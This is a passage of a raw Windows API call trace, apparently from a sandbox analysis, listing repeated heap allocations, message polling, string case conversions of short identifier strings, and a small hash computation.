RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.413] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.413] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.413] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.413] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.413] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.414] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0251.414] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0251.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.414] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0251.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.415] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.415] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.416] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.416] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.416] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0251.416] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.416] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.416] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.416] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.417] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0251.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.418] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.418] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.418] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0251.418] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.418] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0251.418] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.418] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.418] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0251.419] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.419] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.419] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.419] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.419] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.420] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0251.420] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.420] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.420] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.420] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.420] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0251.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0251.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.421] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0251.421] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.422] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0251.423] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.423] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0251.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0251.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0251.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0251.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0251.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.424] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.424] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.424] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.424] CryptHashData (hHash=0xaa59a0, pbData=0x24b17c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0251.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 